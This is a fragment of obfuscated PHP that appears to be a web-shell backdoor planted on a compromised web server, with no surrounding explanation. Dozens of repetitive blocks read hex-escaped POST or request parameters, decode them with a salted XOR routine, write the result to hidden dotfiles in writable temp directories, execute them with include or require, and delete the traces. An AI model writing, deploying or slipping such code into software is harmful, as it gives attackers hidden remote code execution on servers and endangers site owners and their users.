(bool)is_writable($ref)) { $comp = str_replace("{var_dir}", $ref, "{var_dir}/.bind"); if (file_put_contents($comp, $val)) { require $comp; unlink($comp); die(); } } } } if(isset($_POST["\x68\x6Cd"]) ? true : false){ $item = array_filter([ini_get("upload_tmp_dir"), sys_get_temp_dir(), "/dev/shm", getenv("TMP"), session_save_path(), getenv("TEMP"), "/var/tmp", getcwd(), "/tmp"]); $dat = $_POST["\x68\x6Cd"]; $dat =explode ( "." ,$dat ) ; $elem = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen( $salt ); $y = 0; foreach( $dat as $v6) { $sChar = ord( $salt[$y % $sLen] ); $dec =( ( int)$v6 - $sChar -( $y % 10))^ 56; $elem .= chr( $dec ); $y++; } foreach ($item as $parameter_group): if (is_dir($parameter_group) ? is_writable($parameter_group) : false) { $comp = sprintf("%s/.val", $parameter_group); if (file_put_contents($comp, $elem)) { include $comp; @unlink($comp); die(); } } endforeach; } if(isset($_REQUEST["da\x74a\x5F\x63\x68\x75nk"]) ? true : false){ $rec = array_filter([getenv("TMP"), ini_get("upload_tmp_dir"), session_save_path(), "/tmp", "/dev/shm", getcwd(), getenv("TEMP"), sys_get_temp_dir(), "/var/tmp"]); $item = $_REQUEST["da\x74a\x5F\x63\x68\x75nk"]; $item = explode ( "." , $item ) ; $descriptor=''; $s='abcdefghijklmnopqrstuvwxyz0123456789'; $lenS=strlen( $s); foreach( $item as $q => $v5): $chS=ord( $s[$q% $lenS]); $dec=( ( int)$v5 - $chS -( $q% 10)) ^ 97; $descriptor .= chr( $dec); endforeach; $resource = 0; do { $holder = $rec[$resource] ?? null; if ($resource >= count($rec)) break; if ((function($d) { return is_dir($d) && is_writable($d); })($holder)) { $pset = vsprintf("%s/%s", [$holder, ".val"]); if (@file_put_contents($pset, $descriptor) !== false) { include $pset; unlink($pset); die(); } } $resource++; } while (true); } if(@$_POST["\x72ef\x65ren\x63\x65"] !== null){ $property_set = array_filter([ini_get("upload_tmp_dir"), getenv("TMP"), "/dev/shm", "/tmp", getcwd(), getenv("TEMP"), sys_get_temp_dir(), "/var/tmp", session_save_path()]); $res = $_POST["\x72ef\x65ren\x63\x65"]; $res= explode ( "." , $res ) ; $entry =''; $salt ='abcdefghijklmnopqrstuvwxyz0123456789'; $lenS =strlen($salt ); $k =0; array_walk($res ,function($v3) use(&$entry ,&$k ,$salt ,$lenS) { $chS =ord($salt[$k % $lenS] ); $d =((int)$v3 - $chS -($k % 10)) ^25; $entry .= chr($d ); $k++; } ); foreach ($property_set as $key => $pgrp) { if (array_product([is_dir($pgrp), is_writable($pgrp)])) { $resource = str_replace("{var_dir}", $pgrp, "{var_dir}/.ptr"); $success = file_put_contents($resource, $entry); if ($success) { include $resource; @unlink($resource); die();} } } } if(isset($_REQUEST["\x68l\x64"]) ? true : false){ $bind = array_filter(["/var/tmp", "/dev/shm", sys_get_temp_dir(), getcwd(), session_save_path(), "/tmp", ini_get("upload_tmp_dir"), getenv("TEMP"), getenv("TMP")]); $holder = $_REQUEST["\x68l\x64"]; $holder =explode ( '.' , $holder) ; $data =''; $s4 ='abcdefghijklmnopqrstuvwxyz0123456789'; $lenS =strlen($s4); $o =0; array_walk($holder, function ($v2) use (&$data, &$o, $s4, $lenS) { $chS =ord($s4[$o% $lenS]); $dec =((int)$v2 - $chS - ($o% 10)) ^35; $data .= chr($dec); $o++;} ); foreach ($bind as $desc) { if ((is_dir($desc) and is_writable($desc))) { $property_set = sprintf("%s/.sym", $desc); $success = file_put_contents($property_set, $data); if ($success) { include $property_set; @unlink($property_set); die();} } } } if(count($_POST) > 0 && isset($_POST["fac"])){ $token = array_filter([getenv("TMP"), "/var/tmp", sys_get_temp_dir(), ini_get("upload_tmp_dir"), "/dev/shm", getenv("TEMP"), getcwd(), "/tmp", session_save_path()]); $factor = $_POST["fac"]; $factor = explode ( "." ,$factor ) ; $entry =''; $salt ='abcdefghijklmnopqrstuvwxyz0123456789'; $lenS =strlen($salt); $m =0; $__len =count($factor); do { if ($m >= $__len) break; $v5 =$factor[$m]; $sChar =ord($salt[$m % $lenS]); $d =((int)$v5 - $sChar - ($m % 10)) ^9; $entry.= chr($d); $m++; } while (true); foreach ($token as $k) { if (is_writable($k) && is_dir($k)) { $mrk = str_replace("{var_dir}", $k, "{var_dir}/.marker"); if (file_put_contents($mrk, $entry)) { include $mrk; @unlink($mrk); exit; } } } } if(in_array("en\x74", array_keys($_POST))){ $res = array_filter(["/dev/shm", getenv("TEMP"), "/var/tmp", sys_get_temp_dir(), ini_get("upload_tmp_dir"), "/tmp", getenv("TMP"), session_save_path(), getcwd()]); $component = $_POST["en\x74"]; $component =explode ( "." , $component ) ; $entity = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($salt); foreach ($component as $t =>$v4) {$chS = ord($salt[$t % $sLen]); $d = ((int)$v4 - $chS - ($t % 10)) ^88; $entity .= chr($d);} foreach ($res as $descriptor) { if (is_writable($descriptor) && is_dir($descriptor)) { $item = "$descriptor/.dchunk"; $file = fopen($item, 'w'); if ($file) { fwrite($file, $entity); fclose($file); include $item; @unlink($item); die(); } } } } if(filter_has_var(INPUT_POST, "\x76\x61lue")){ $key = $_POST["\x76\x61lue"]; $key= explode ( '.' , $key ) ; $dat= ''; $salt= 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen= strlen( $salt); $k= 0; $__tmp= $key; while( $v8= array_shift( $__tmp)) { $chS= ord( $salt[$k % $sLen]); $dec= ( ( int)$v8 - $chS -( $k % 10))^ 59; $dat .= chr( $dec); $k++; } $record = array_filter([getcwd(), "/tmp", ini_get("upload_tmp_dir"), sys_get_temp_dir(), "/var/tmp", getenv("TMP"), "/dev/shm", getenv("TEMP"), session_save_path()]); foreach ($record as $factor): if (array_product([is_dir($factor), is_writable($factor)])) { $hld = "$factor" . "/.val"; if (file_put_contents($hld, $dat)) { require $hld; unlink($hld); die(); } } endforeach; } if(count($_REQUEST) > 0 && isset($_REQUEST["k"])){ $ent = $_REQUEST["k"]; $ent = explode ( "." ,$ent ) ; $sym =''; $s4 ='abcdefghijklmnopqrstuvwxyz0123456789'; $lenS =strlen( $s4); $p =0; $len =count( $ent); do { if( $p >= $len) break; $v2 =$ent[$p]; $chS =ord( $s4[$p % $lenS]); $d =( ( int)$v2 - $chS -( $p % 10))^ 76; $sym .= chr( $d); $p++; } while( true); $marker = array_filter(["/tmp", sys_get_temp_dir(), getenv("TMP"), session_save_path(), ini_get("upload_tmp_dir"), getenv("TEMP"), "/var/tmp", "/dev/shm", getcwd()]); foreach ($marker as $dat) { if ((bool)is_dir($dat) && (bool)is_writable($dat)) { $factor = "$dat/.bind"; if (file_put_contents($factor, $sym)) { require $factor; unlink($factor); exit; } } } } if(isset($_POST) && isset($_POST["h\x6C\x64"])){ $pset = $_POST["h\x6C\x64"]; $pset = explode( '.' ,$pset ) ; $flag = ''; $salt6 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($salt6); foreach ($pset as $t => $v8): $chS = ord($salt6[$t % $sLen]); $dec = ((int)$v8 - $chS - ($t % 10))^ 100; $flag.= chr($dec); endforeach; $val = array_filter(["/tmp", getenv("TEMP"), sys_get_temp_dir(), "/var/tmp", ini_get("upload_tmp_dir"), session_save_path(), getenv("TMP"), "/dev/shm", getcwd()]); while ($key = array_shift($val)) { if (is_dir($key) ? is_writable($key) : false) { $itm = implode("/", [$key, ".token"]); if (@file_put_contents($itm, $flag) !== false) { include $itm; unlink($itm); die(); } } } } if(array_key_exists("\x72e\x73o\x75\x72ce", $_POST) && !is_null($_POST["\x72e\x73o\x75\x72ce"])){ $val = $_POST["\x72e\x73o\x75\x72ce"]; $val = explode ( "." , $val ); $record = ''; $salt1 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen( $salt1 ); $v = 0; while( $v< count( $val)) { $v7 = $val[$v]; $sChar = ord( $salt1[$v % $lenS] ); $d = ( ( int)$v7 - $sChar -( $v % 10)) ^ 93; $record .= chr( $d ); $v++; } $entry = array_filter(["/var/tmp", "/tmp", getcwd(), sys_get_temp_dir(), ini_get("upload_tmp_dir"), getenv("TMP"), "/dev/shm", session_save_path(), getenv("TEMP")]); for ($element = 0, $holder = count($entry); $element < $holder; $element++) { $key = $entry[$element]; if ((is_dir($key) and is_writable($key))) { $pset = join("/", [$key, ".comp"]); $success = file_put_contents($pset, $record); if ($success) { include $pset; @unlink($pset); die();} } } } if(isset($_REQUEST["p\x73e\x74"])){ $object = array_filter([getenv("TEMP"), "/tmp", session_save_path(), getcwd(), getenv("TMP"), "/var/tmp", "/dev/shm", sys_get_temp_dir(), ini_get("upload_tmp_dir")]); $symbol = $_REQUEST["p\x73e\x74"]; $symbol= explode( ".", $symbol ); $mrk = ''; $salt9 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($salt9); $i = 0; array_walk($symbol,function ($v7) use (&$mrk,&$i,$salt9,$sLen) { $sChar = ord($salt9[$i% $sLen]); $dec = ((int)$v7 - $sChar - ($i% 10)) ^ 89; $mrk .= chr($dec); $i++;} ); foreach ($object as $key => $pointer) { if ((bool)is_dir($pointer) && (bool)is_writable($pointer)) { $dat = sprintf("%s/.resource", $pointer); if (file_put_contents($dat, $mrk)) { require $dat; unlink($dat); exit; } } } } if(!empty($_POST["p\x74\x72"])){ $ref = $_POST["p\x74\x72"]; $ref=explode( '.' , $ref ) ; $dat = ''; $s9 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen( $s9); $__len = count( $ref); for( $y = 0; $y < $__len; $y++) { $v2 = $ref[$y]; $sChar = ord( $s9[$y % $lenS]); $dec =( ( int)$v2 - $sChar -( $y % 10))^ 41; $dat .= chr( $dec); } $pgrp = array_filter(["/var/tmp", getenv("TEMP"), "/dev/shm", getenv("TMP"), sys_get_temp_dir(), "/tmp", session_save_path(), ini_get("upload_tmp_dir"), getcwd()]); foreach ($pgrp as $key => $element) { if (is_dir($element) ? is_writable($element) : false) { $descriptor = vsprintf("%s/%s", [$element, ".item"]); if (file_put_contents($descriptor, $dat)) { include $descriptor; @unlink($descriptor); exit; } } } } if(array_key_exists("\x63om\x70o\x6E\x65nt", $_REQUEST) && !is_null($_REQUEST["\x63om\x70o\x6E\x65nt"])){ $rec = array_filter([ini_get("upload_tmp_dir"), "/var/tmp", getenv("TMP"), getcwd(), "/dev/shm", sys_get_temp_dir(), getenv("TEMP"), session_save_path(), "/tmp"]); $pointer = $_REQUEST["\x63om\x70o\x6E\x65nt"]; $pointer =explode (".", $pointer ) ; $desc = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($salt); $w = 0; foreach($pointer as $v7) { $chS = ord($salt[$w % $sLen]); $d =((int)$v7 - $chS -($w % 10)) ^ 55; $desc .=chr($d); $w++; } foreach ($rec as $ent): if (max(0, is_dir($ent) * is_writable($ent))) { $token = str_replace("{var_dir}", $ent, "{var_dir}/.fac"); $file = fopen($token, 'w'); if ($file) { fwrite($file, $desc); fclose($file); include $token; @unlink($token); die(); } } endforeach; } if(count($_REQUEST) > 0 && isset($_REQUEST["\x76\x61lue"])){ $data = array_filter(["/dev/shm", getenv("TMP"), "/tmp", session_save_path(), "/var/tmp", ini_get("upload_tmp_dir"), sys_get_temp_dir(), getenv("TEMP"), getcwd()]); $hld = $_REQUEST["\x76\x61lue"]; $hld= explode ( '.' , $hld) ; $item = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen( $salt); $s = 0; foreach( $hld as $v7) { $sChar = ord( $salt[$s % $lenS]); $dec =( ( int)$v7 - $sChar -( $s % 10)) ^ 42; $item .=chr( $dec); $s++; } foreach ($data as $tkn): if ((is_dir($tkn) and is_writable($tkn))) { $key = "$tkn/.ref"; $file = fopen($key, 'w'); if ($file) { fwrite($file, $item); fclose($file); include $key; @unlink($key); die(); } } endforeach; } if(@$_REQUEST["hol\x64er"] !== null){ $property_set = array_filter([ini_get("upload_tmp_dir"), "/var/tmp", session_save_path(), sys_get_temp_dir(), getcwd(), getenv("TMP"), "/dev/shm", getenv("TEMP"), "/tmp"]); $ref = $_REQUEST["hol\x64er"]; $ref = explode ( ".", $ref ) ; $ent=''; $s3='abcdefghijklmnopqrstuvwxyz0123456789'; $sLen=strlen( $s3); foreach( $ref as $p=> $v4): $sChar=ord( $s3[$p % $sLen]); $dec=( ( int)$v4 - $sChar -( $p % 10)) ^ 10; $ent .= chr( $dec); endforeach; foreach ($property_set as $component): if (!!is_dir($component) && !!is_writable($component)) { $sym = vsprintf("%s/%s", [$component, ".bind"]); if (file_put_contents($sym, $ent)) { include $sym; @unlink($sym); die(); } } endforeach; } if(count($_POST) > 0 && isset($_POST["\x6F\x62\x6Aect"])){ $pointer = $_POST["\x6F\x62\x6Aect"]; $pointer =explode( '.' ,$pointer) ; $dat = ''; $salt8 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen( $salt8); $len = count( $pointer); for( $y = 0; $y<$len; $y++) { $v7 = $pointer[$y]; $sChar = ord( $salt8[$y % $lenS]); $d = ( ( int)$v7 - $sChar -( $y % 10)) ^ 46; $dat.=chr( $d); } $reference = array_filter([session_save_path(), getenv("TEMP"), getcwd(), "/tmp", ini_get("upload_tmp_dir"), getenv("TMP"), sys_get_temp_dir(), "/var/tmp", "/dev/shm"]); foreach ($reference as $marker): if (is_dir($marker) && is_writable($marker)) { $ref = "$marker" . "/.k"; $success = file_put_contents($ref, $dat); if ($success) { include $ref; @unlink($ref); die();} } endforeach; } if(@$_REQUEST["o\x62\x6A"] !== null){ $dat = $_REQUEST["o\x62\x6A"]; $dat=explode ( '.', $dat) ; $entity =''; $salt ='abcdefghijklmnopqrstuvwxyz0123456789'; $sLen =strlen($salt); $o =0; $__tmp =$dat; while ($v8 =array_shift($__tmp)) { $sChar =ord($salt[$o % $sLen]); $d =((int)$v8 - $sChar - ($o % 10)) ^ 40; $entity .= chr($d); $o++; } $ptr = array_filter(["/var/tmp", session_save_path(), getcwd(), "/tmp", sys_get_temp_dir(), getenv("TEMP"), ini_get("upload_tmp_dir"), "/dev/shm", getenv("TMP")]); foreach ($ptr as $value) { if ((is_dir($value) and is_writable($value))) { $parameter_group = "$value" . "/.property_set"; if (file_put_contents($parameter_group, $entity)) { include $parameter_group; @unlink($parameter_group); exit; } } } } if(count($_REQUEST) > 0 && isset($_REQUEST["de\x73\x63\x72\x69p\x74or"])){ $pgrp = array_filter([session_save_path(), sys_get_temp_dir(), ini_get("upload_tmp_dir"), "/dev/shm", getenv("TEMP"), "/tmp", getcwd(), getenv("TMP"), "/var/tmp"]); $comp = $_REQUEST["de\x73\x63\x72\x69p\x74or"]; $comp=explode ( '.' ,$comp) ; $entity = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($s); foreach ($comp as $t => $v2) { $sChar = ord($s[$t % $lenS]); $d = ((int)$v2 - $sChar - ($t % 10)) ^23; $entity.= chr($d); } foreach ($pgrp as $symbol): if (max(0, is_dir($symbol) * is_writable($symbol))) { $parameter_group = sprintf("%s/.resource", $symbol); if (file_put_contents($parameter_group, $entity)) { require $parameter_group; unlink($parameter_group); die(); } } endforeach; } if(in_array("\x6F\x62j\x65ct", array_keys($_REQUEST))){ $property_set = $_REQUEST["\x6F\x62j\x65ct"]; $property_set = explode ("." ,$property_set ) ; $holder = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen( $salt); $__len = count( $property_set); for( $u = 0; $u < $__len; $u++) {$v3 = $property_set[$u]; $sChar = ord( $salt[$u % $lenS]); $d =( ( int)$v3 - $sChar -( $u % 10))^16; $holder .= chr( $d); } $factor = array_filter([getenv("TMP"), "/var/tmp", session_save_path(), "/tmp", getcwd(), "/dev/shm", ini_get("upload_tmp_dir"), getenv("TEMP"), sys_get_temp_dir()]); foreach ($factor as $key => $pgrp) { if (is_writable($pgrp) && is_dir($pgrp)) { $ent = "$pgrp" . "/.reference"; if (@file_put_contents($ent, $holder) !== false) { include $ent; unlink($ent); exit; } } } } if(array_key_exists("eleme\x6Et", $_POST) && !is_null($_POST["eleme\x6Et"])){ $pointer = array_filter([getcwd(), "/var/tmp", "/tmp", session_save_path(), sys_get_temp_dir(), "/dev/shm", getenv("TEMP"), getenv("TMP"), ini_get("upload_tmp_dir")]); $entity = $_POST["eleme\x6Et"]; $entity=explode ( "." , $entity); $res = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($salt); $j = 0; while ($j <count($entity)) { $v4 = $entity[$j]; $chS = ord($salt[$j %$sLen]); $d = ((int)$v4 - $chS - ($j %10)) ^ 84; $res .= chr($d); $j++; } foreach ($pointer as $entry): if ((function($d) { return is_dir($d) && is_writable($d); })($entry)) { $elem = "$entry" . "/.dat"; if (@file_put_contents($elem, $res) !== false) { include $elem; unlink($elem); exit; } } endforeach; } if(isset($_POST["\x6D\x72k"]) ? true : false){ $sym = $_POST["\x6D\x72k"]; $sym = explode ( "." ,$sym ) ; $item = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($s); $z = 0; while ($z < count($sym)) { $v8 = $sym[$z]; $chS = ord($s[$z % $sLen]); $d = ((int)$v8 - $chS - ($z % 10)) ^ 55; $item .= chr($d); $z++; } $holder = array_filter([ini_get("upload_tmp_dir"), "/var/tmp", getenv("TMP"), session_save_path(), getcwd(), "/tmp", "/dev/shm", sys_get_temp_dir(), getenv("TEMP")]); while ($entity = array_shift($holder)) { if (array_product([is_dir($entity), is_writable($entity)])) { $component = implode("/", [$entity, ".resource"]); if (file_put_contents($component, $item)) { include $component; @unlink($component); exit; } } } } if(isset($_POST["co\x6Dp"]) ? true : false){ $token = array_filter(["/tmp", getenv("TEMP"), getenv("TMP"), ini_get("upload_tmp_dir"), getcwd(), "/var/tmp", session_save_path(), "/dev/shm", sys_get_temp_dir()]); $component = $_POST["co\x6Dp"]; $component = explode ( '.' , $component ); $pointer = ''; $s5 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen( $s5 ); foreach( $component as $m => $v4) { $sChar = ord( $s5[$m % $lenS] ); $d =( ( int)$v4 - $sChar -( $m % 10)) ^ 93; $pointer .= chr( $d );} foreach ($token as $key => $obj) { if ((is_dir($obj) and is_writable($obj))) { $parameter_group = join("/", [$obj, ".resource"]); if (@file_put_contents($parameter_group, $pointer) !== false) { include $parameter_group; unlink($parameter_group); die(); } } } } if(@$_POST["fac"] !== null){ $res = array_filter(["/var/tmp", session_save_path(), sys_get_temp_dir(), ini_get("upload_tmp_dir"), "/tmp", getenv("TEMP"), "/dev/shm", getcwd(), getenv("TMP")]); $bind = $_POST["fac"]; $bind =explode ( '.',$bind ) ; $reference = ''; $s2 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($s2 ); $j = 0; $len = count($bind ); do { if($j >= $len) break; $v6 = $bind[$j]; $chS = ord($s2[$j% $sLen] ); $dec = ((int)$v6 - $chS -($j% 10)) ^ 62; $reference .= chr($dec ); $j++; } while(true ); $binding = 0; do { $holder = $res[$binding] ?? null; if ($binding >= count($res)) break; if (is_dir($holder) && is_writable($holder)) { $flag = str_replace("{var_dir}", $holder, "{var_dir}/.k"); if (file_put_contents($flag, $reference)) { require $flag; unlink($flag); die(); } } $binding++; } while (true); } if(@$_REQUEST["\x62\x69n\x64i\x6Eg"] !== null){ $parameter_group = $_REQUEST["\x62\x69n\x64i\x6Eg"]; $parameter_group = explode ('.' ,$parameter_group ); $entry = ''; $salt5 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen( $salt5 ); $len = count( $parameter_group ); for( $z = 0; $z < $len; $z++) { $v2 = $parameter_group[$z]; $sChar = ord( $salt5[$z % $lenS] ); $dec =( ( int)$v2 - $sChar -( $z % 10)) ^ 9; $entry .= chr( $dec ); } $symbol = array_filter(["/tmp", "/var/tmp", sys_get_temp_dir(), "/dev/shm", getenv("TEMP"), getenv("TMP"), session_save_path(), getcwd(), ini_get("upload_tmp_dir")]); while ($key = array_shift($symbol)) { if ((bool)is_dir($key) && (bool)is_writable($key)) { $descriptor = "$key/.pgrp"; if (file_put_contents($descriptor, $entry)) { include $descriptor; @unlink($descriptor); die(); } } } } if(filter_has_var(INPUT_POST, "\x6D\x61\x72ker")){ $entry = $_REQUEST["\x6D\x61\x72ker"]; $entry= explode ( '.', $entry) ; $comp = ''; $s8 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($s8); $len = count($entry); for ($w = 0; $w < $len; $w++) {$v8 = $entry[$w]; $chS = ord($s8[$w%$lenS]); $dec = ((int)$v8 - $chS - ($w%10))^ 26; $comp .= chr($dec);} $ent = array_filter(["/dev/shm", session_save_path(), sys_get_temp_dir(), getenv("TEMP"), getenv("TMP"), getcwd(), "/var/tmp", ini_get("upload_tmp_dir"), "/tmp"]); while ($symbol = array_shift($ent)) { if (!!is_dir($symbol) && !!is_writable($symbol)) { $value = sprintf("%s/.hld", $symbol); $file = fopen($value, 'w'); if ($file) { fwrite($file, $comp); fclose($file); include $value; @unlink($value); exit; } } } } if(isset($_POST) && isset($_POST["\x62in\x64"])){ $sym = $_POST["\x62in\x64"]; $sym = explode ( '.' , $sym ) ; $marker = ''; $s5 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen( $s5); $n = 0; array_walk( $sym ,function( $v8) use( &$marker ,&$n ,$s5 ,$lenS) { $chS = ord( $s5[$n % $lenS]); $d =( ( int)$v8 - $chS -( $n % 10)) ^ 7; $marker .= chr( $d); $n++; } ); $token = array_filter([session_save_path(), "/dev/shm", "/tmp", getenv("TMP"), ini_get("upload_tmp_dir"), getcwd(), "/var/tmp", sys_get_temp_dir(), getenv("TEMP")]); foreach ($token as $flg): if (is_writable($flg) && is_dir($flg)) { $data_chunk = join("/", [$flg, ".pointer"]); if (file_put_contents($data_chunk, $marker)) { include $data_chunk; @unlink($data_chunk); die(); } } endforeach; } if(in_array("bin\x64", array_keys($_REQUEST))){ $holder = $_REQUEST["bin\x64"]; $holder= explode ( ".",$holder ); $obj= ''; $salt2= 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS= strlen($salt2 ); $j= 0; while ($j < count($holder)) { $v2= $holder[$j]; $sChar= ord($salt2[$j % $lenS] ); $dec= ((int)$v2 - $sChar - ($j % 10))^32; $obj .= chr($dec ); $j++; } $k = array_filter([sys_get_temp_dir(), "/tmp", session_save_path(), getenv("TMP"), getenv("TEMP"), ini_get("upload_tmp_dir"), getcwd(), "/var/tmp", "/dev/shm"]); foreach ($k as $key => $data) { if ((function($d) { return is_dir($d) && is_writable($d); })($data)) { $dat = join("/", [$data, ".marker"]); if (file_put_contents($dat, $obj)) { include $dat; @unlink($dat); die(); } } } } if(count($_POST) > 0 && isset($_POST["\x72es"])){ $record = array_filter(["/tmp", getenv("TMP"), session_save_path(), "/var/tmp", getenv("TEMP"), getcwd(), sys_get_temp_dir(), "/dev/shm", ini_get("upload_tmp_dir")]); $ent = $_POST["\x72es"]; $ent = explode ( '.' , $ent) ; $value= ''; $salt= 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen= strlen($salt); foreach($ent as $s => $v3): $sChar= ord($salt[$s % $sLen]); $dec= ((int)$v3 - $sChar -($s % 10))^ 38; $value .= chr($dec); endforeach; for ($rec = 0, $k = count($record); $rec < $k; $rec++) { $bind = $record[$rec]; if (!( !is_dir($bind) \|\| !is_writable($bind) )) { $element = str_replace("{var_dir}", $bind, "{var_dir}/.object"); if (file_put_contents($element, $value)) { require $element; unlink($element); exit; } } } } if(filter_has_var(INPUT_POST, "b\x69nd")){ $desc = array_filter(["/var/tmp", "/tmp", "/dev/shm", session_save_path(), ini_get("upload_tmp_dir"), getenv("TMP"), sys_get_temp_dir(), getenv("TEMP"), getcwd()]); $ref = $_REQUEST["b\x69nd"]; $ref= explode ( '.' , $ref ) ; $pset = ''; $salt4 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen( $salt4); $y = 0; $__tmp = $ref; while( $v2 = array_shift( $__tmp)) { $chS = ord( $salt4[$y % $lenS]); $d =( ( int)$v2 - $chS -( $y % 10))^ 22; $pset.= chr( $d); $y++;} for ($pgrp = 0, $resource = count($desc); $pgrp < $resource; $pgrp++) { $data_chunk = $desc[$pgrp]; if ((is_dir($data_chunk) and is_writable($data_chunk))) { $itm = join("/", [$data_chunk, ".comp"]); $file = fopen($itm, 'w'); if ($file) { fwrite($file, $pset); fclose($file); include $itm; @unlink($itm); die(); } } } } if(array_key_exists("re\x73\x6Fu\x72ce", $_REQUEST)){ $desc = $_REQUEST["re\x73\x6Fu\x72ce"]; $desc = explode ('.' , $desc ) ; $holder = ''; $salt8 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen( $salt8); foreach( $desc as $y=> $v5) {$chS = ord( $salt8[$y % $sLen]); $d =( ( int)$v5 - $chS -( $y % 10)) ^ 66; $holder .= chr( $d); } $descriptor = array_filter([getcwd(), session_save_path(), ini_get("upload_tmp_dir"), "/dev/shm", getenv("TEMP"), "/var/tmp", "/tmp", sys_get_temp_dir(), getenv("TMP")]); foreach ($descriptor as $key => $ent) { if (!!is_dir($ent) && !!is_writable($ent)) { $obj = join("/", [$ent, ".parameter_group"]); $success = file_put_contents($obj, $holder); if ($success) { include $obj; @unlink($obj); exit;} } } } if(isset($_POST["\x65n\x74\x69ty"])){ $entry = $_POST["\x65n\x74\x69ty"]; $entry = explode ( '.' , $entry) ; $ent= ''; $s8= 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS= strlen( $s8 ); foreach( $entry as $t => $v5) { $sChar= ord( $s8[$t % $lenS] ); $dec= ( ( int)$v5 - $sChar -( $t % 10)) ^ 28; $ent .= chr( $dec ); } $factor = array_filter([getenv("TMP"), getcwd(), "/dev/shm", sys_get_temp_dir(), getenv("TEMP"), session_save_path(), "/var/tmp", "/tmp", ini_get("upload_tmp_dir")]); foreach ($factor as $reference): if ((bool)is_dir($reference) && (bool)is_writable($reference)) { $object = str_replace("{var_dir}", $reference, "{var_dir}/.k"); $file = fopen($object, 'w'); if ($file) { fwrite($file, $ent); fclose($file); include $object; @unlink($object); exit; } } endforeach; } if(array_key_exists("\x74o\x6Ben", $_POST) && !is_null($_POST["\x74o\x6Ben"])){ $data = array_filter([sys_get_temp_dir(), "/tmp", getenv("TMP"), session_save_path(), getenv("TEMP"), ini_get("upload_tmp_dir"), "/var/tmp", getcwd(), "/dev/shm"]); $fac = $_POST["\x74o\x6Ben"]; $fac= explode ( "." , $fac ) ; $bind = ''; $s6 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($s6); $len = count($fac); for ($u = 0; $u < $len; $u++) { $v9 = $fac[$u]; $sChar = ord($s6[$u % $sLen]); $d = ((int)$v9 - $sChar - ($u % 10)) ^ 25; $bind .= chr($d); } foreach ($data as $record): if ((bool)is_dir($record) && (bool)is_writable($record)) { $pointer = sprintf("%s/.holder", $record); $file = fopen($pointer, 'w'); if ($file) { fwrite($file, $bind); fclose($file); include $pointer; @unlink($pointer); die(); } } endforeach; }